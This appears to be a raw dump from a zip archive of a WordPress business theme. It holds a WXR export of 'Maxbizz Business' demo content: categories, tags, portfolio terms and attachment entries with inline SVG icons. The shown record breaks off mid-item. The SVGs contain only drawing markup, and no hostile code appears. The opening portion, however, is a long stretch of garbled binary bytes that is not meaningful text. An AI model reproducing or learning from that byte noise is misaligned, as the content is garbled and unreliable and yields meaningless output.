u��K��������r�{�2{{`��&����T�Q.G���v��;�i����b���|�{t�%�R0{���ʔ�eO���טy�)d��M{��@�@)��=u[q^���'��h�ݮ�m=ŷ����Fh)�NMjr�1"$F�Q.h����>8H2�*�*ƅۢ��[�wr�o��`�[֛K���yܘ�W�'�y_|��g��������C���6�@G˪\���`G���Ԍ~�����=H�����xӤj�=���^T|C�_$�S2W��4��N���)����kƝ#Y-	�����x*�?%���Z�Aؑ�m/_f�����T̶z���^�zHzJ��Bp�.��2)<$���udehI>� )�Jt3[Fr1��qh�+|j�+Cҟ,6�{h].&�Ū;S��9�%+��,�W���Y&l-�?��G�$��No��O���?�Ӈ�=������|�e��Oi_����NoӺW�����x��>h���|���sK���?�ӛ�ޙ������(������G�*��֙������K�I:IU=�a�1����zeS�ݿ��f�����0�P���Eq[�B�
i]�x��qA��͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb��sf�V�a�Q��\a\\�i\U@�W[�n8���1~9��3p��㊨p��㛎*��7_�n8����$R����A�8�㊱��⬶�x�����ㅁro�����k$T�n���<�x����a�O�߭���� s�U�c�e.e,n�,pm�
��$/�4����x�P�(���m�/Y��?���/�(_{��w*������8��ɴ���8U�c�Pኻ6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث���b�i�L~jb�)���eS[L��S51U��Lu3S[L��S51U��Lu3S[L��S51U��Lu3SC\��t�%Z�+��r=y�Mf�?G��?��J��Ȭ
�N���O���nÞX�����F8a���V��
��.�\)���3Q14]�'��~B�0M����c����a�FH��_B�?y'�}�a��8��k�>��A@
��2鎦jfK�[L��S.���e�.��V��f�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lU��L�������` E�'((�,z�N��zs�?���O�Hsf����B	ڇ'f͛$��ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*����6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU����3f�]���6lU��PK�8FZ�+��6+6+*inc/backend/data/business/demo-content.xmlnu�[���<?xml version="1.0" encoding="UTF-8" ?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your site. -->
<!-- It contains information about your site's posts, pages, comments, categories, and other content. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- This file is not intended to serve as a complete backup of your site. -->

<!-- To import this information into a WordPress site follow these steps: -->
<!-- 1. Log in to that site as an administrator. -->
<!-- 2. Go to Tools: Import in the WordPress admin panel. -->
<!-- 3. Install the "WordPress" importer from the list. -->
<!-- 4. Activate & Run Importer. -->
<!-- 5. Upload this file using the form provided on that page. -->
<!-- 6. You will first be asked to map the authors in this export file to users -->
<!--    on the site. For each author, you may choose to map to an -->
<!--    existing user on the site or to create a new user. -->
<!-- 7. WordPress will then import each of the posts, pages, comments, categories, etc. -->
<!--    contained in this file into your site. -->

	<!-- generator="WordPress/5.6" created="2020-12-31 08:18" -->
<rss version="2.0"
	xmlns:excerpt="http://wordpress.org/export/1.2/excerpt/"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:wp="http://wordpress.org/export/1.2/"
>

<channel>
	<title>Maxbizz Business</title>
	<link>http://wpdemo.archiwp.com/maxbizz-business</link>
	<description>Financial &#38; Consulting Demo WordPress Theme</description>
	<pubDate>Thu, 31 Dec 2020 08:18:22 +0000</pubDate>
	<language>en-US</language>
	<wp:wxr_version>1.2</wp:wxr_version>
	<wp:base_site_url>http://wpdemo.archiwp.com/</wp:base_site_url>
	<wp:base_blog_url>http://wpdemo.archiwp.com/maxbizz-business</wp:base_blog_url>

		<wp:author><wp:author_id>1</wp:author_id><wp:author_login><![CDATA[admin]]></wp:author_login><wp:author_email><![CDATA[support@oceanthemes.net]]></wp:author_email><wp:author_display_name><![CDATA[Tom Black]]></wp:author_display_name><wp:author_first_name><![CDATA[Tom]]></wp:author_first_name><wp:author_last_name><![CDATA[Black]]></wp:author_last_name></wp:author>

		<wp:category>
		<wp:term_id>2</wp:term_id>
		<wp:category_nicename><![CDATA[business]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[business]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>3</wp:term_id>
		<wp:category_nicename><![CDATA[consulting]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[consulting]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>4</wp:term_id>
		<wp:category_nicename><![CDATA[finance]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[finance]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>5</wp:term_id>
		<wp:category_nicename><![CDATA[marketing]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[marketing]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>1</wp:term_id>
		<wp:category_nicename><![CDATA[uncategorized]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[Uncategorized]]></wp:cat_name>
	</wp:category>
			<wp:tag>
		<wp:term_id>6</wp:term_id>
		<wp:tag_slug><![CDATA[analysis]]></wp:tag_slug>
		<wp:tag_name><![CDATA[analysis]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>7</wp:term_id>
		<wp:tag_slug><![CDATA[business]]></wp:tag_slug>
		<wp:tag_name><![CDATA[business]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>8</wp:term_id>
		<wp:tag_slug><![CDATA[consulting]]></wp:tag_slug>
		<wp:tag_name><![CDATA[consulting]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>9</wp:term_id>
		<wp:tag_slug><![CDATA[finance]]></wp:tag_slug>
		<wp:tag_name><![CDATA[finance]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>10</wp:term_id>
		<wp:tag_slug><![CDATA[marketing]]></wp:tag_slug>
		<wp:tag_name><![CDATA[marketing]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>11</wp:term_id>
		<wp:tag_slug><![CDATA[news]]></wp:tag_slug>
		<wp:tag_name><![CDATA[news]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>12</wp:term_id>
		<wp:tag_slug><![CDATA[strategy]]></wp:tag_slug>
		<wp:tag_name><![CDATA[strategy]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>13</wp:term_id>
		<wp:tag_slug><![CDATA[tips]]></wp:tag_slug>
		<wp:tag_name><![CDATA[tips]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>14</wp:term_id>
		<wp:tag_slug><![CDATA[trading]]></wp:tag_slug>
		<wp:tag_name><![CDATA[trading]]></wp:tag_name>
	</wp:tag>
			<wp:term>
		<wp:term_id>15</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[business]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[business]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>16</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[finance]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[finance]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>17</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[marketing]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[marketing]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>18</wp:term_id>
		<wp:term_taxonomy><![CDATA[elementor_library_type]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[page]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[page]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>19</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[startup]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[startup]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>20</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[strategy]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[strategy]]></wp:term_name>
	</wp:term>
			<wp:term><wp:term_id>21</wp:term_id><wp:term_taxonomy>nav_menu</wp:term_taxonomy><wp:term_slug><![CDATA[main-menu]]></wp:term_slug><wp:term_name><![CDATA[Main Menu]]></wp:term_name>
</wp:term>

	<generator>https://wordpress.org/?v=5.6</generator>

<image>
	<url>https://maxbizz.s3.amazonaws.com/images/favicon-red.png</url>
	<title>Maxbizz Business</title>
	<link>http://wpdemo.archiwp.com/maxbizz-business</link>
	<width>32</width>
	<height>32</height>
</image> 

		<item>
		<title>01_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-1/01_black/</link>
		<pubDate>Thu, 03 Sep 2020 09:10:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>334</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:10:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:10:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/01_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="0" style="stop-color:#FFD797"></stop>
	<stop offset="1" style="stop-color:#FF8523"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>call</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-1/call/</link>
		<pubDate>Thu, 03 Sep 2020 09:13:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/call.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>345</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:13:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:13:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[call]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/call.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/call.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pin</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-1/pin/</link>
		<pubDate>Thu, 03 Sep 2020 09:14:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pin.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>347</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:14:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:14:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pin]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pin.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/pin.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>symbol</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-2/symbol/</link>
		<pubDate>Thu, 03 Sep 2020 09:34:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/symbol.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>356</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:34:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:34:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[symbol]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>106</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/symbol.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/symbol.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>send</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/side-panel/send/</link>
		<pubDate>Thu, 03 Sep 2020 10:08:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/send.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>374</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:08:36]]></wp:post_date>
